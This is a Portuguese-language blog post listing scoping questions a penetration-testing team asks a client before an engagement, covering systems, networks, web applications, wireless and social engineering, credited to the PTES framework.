<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
Há algum sistema que poderia ser caracterizado como frágil (sistemas que travam normalmente, sistemas operacionais antigos, ou não atualizados)?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
Há sistemas na rede que não são de propriedade do cliente que precisam de autorização adicional para realização dos testes?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
Qual o tempo padrão de reparo de sistemas?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
Há softwares de monitoramento na rede?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
Quais os servidores e aplicações mais críticos?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
Procedimentos de backups são testados regularmente?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<br /></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<br /></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<span style="font-size: 12.8px;"><b>Questões sobre Redes</b></span></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<br /></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
Por que o cliente precisa do teste de invasão realizado em seu ambiente?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
O teste é necessário para algum requerimento específico de compliance?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
Quando os testes podem ser realizados (horário comercial, após horário comercial, durante a madrugada, finais de semana)?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
Quantos IPs serão testados? Quantos IPs internos? Quantos IPs externos?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
Há algum ativo que possa impactar nos resultados dos testes tais como firewall, IDS/IPS, load balancer, web application firewall?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
No caso em que um sistema seja comprometido, como a equipe deve proceder:</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
1 - realizar uma avaliação de vulnerabilidades na máquina comprometida?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
2 - tentar ganhar privilégios mais altos (root ou administrator) na máquina comprometida?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
3 - não realizar ataques, ou realizar testes mínimos ou de dicionários para descobrir senhas locais?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<br /></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<br /></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<b>Questões sobre aplicações WEB</b></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<br /></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
Haverão testes contra aplicações web?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
Quantas aplicações web serão avaliadas?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
Quantos sistemas de login serão avaliados?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
Quantas páginas estáticas serão avaliadas? (aproximadamente)</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
Quantas páginas dinâmicas serão avaliadas? (aproximadamente)</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
O código fonte será disponibilizado?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
Haverá alguma documentação disponível? Se positivo, qual tipo de documentação?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
Será realizada análise estática em alguma aplicação WEB (no código)?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
O cliente deseja que seja feito fuzzing contra a aplicação (testes dinâmicos em busca de bugs)?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
O cliente deseja que sejam feitos testes de acordo com perfil de usuários na aplicação?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
O cliente deseja que seja feita varredura usando credenciais?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<br /></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<br /></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<span style="font-size: 12.8px;"><b>Questões sobre wireless</b></span></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<br /></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
Haverão testes contra redes wireless?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
Quantas redes wireless existem no local?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
Há redes de visitantes? Se positivo:</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
1 - requer autenticação?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
2 - qual tipo de criptografia é usado?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
3 - qual a cobertura em metros quadrados?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
4 - há necessidade de realizar testes com rogue devices?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
5 - haverão testes contra os clientes da rede visitante?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
6 - aproximadamente quantos clientes utilizam a rede?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<br /></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<br /></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<b>Questões sobre Engenharia Social</b></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<br /></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
Haverão testes de engenharia social?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
O cliente possui uma lista de e-mails sobre a qual os ataques serão realizados?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
O cliente possui uma lista de telefones sobre a qual os ataques serão realizados?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
Haverá necessidade de tentativa de obtenção de acesso físico às dependências físicas do cliente?</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<br /></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<span style="font-size: 12.8px;">----------------------------------------//</span><span style="font-size: 12.8px;">----------------------------------------//</span><span style="font-size: 12.8px;">----------------------------------------</span></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<br /></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
Sei que é muita coisa, mas são informações necessárias para sabermos onde e com o que estamos mexendo!</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<br /></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
Créditos à <a href="http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines" target="_blank">PTES Framework</a>.</div>
Luiz Vieira .'.http://www.blogger.com/profile/01939912130155752340noreply@blogger.com1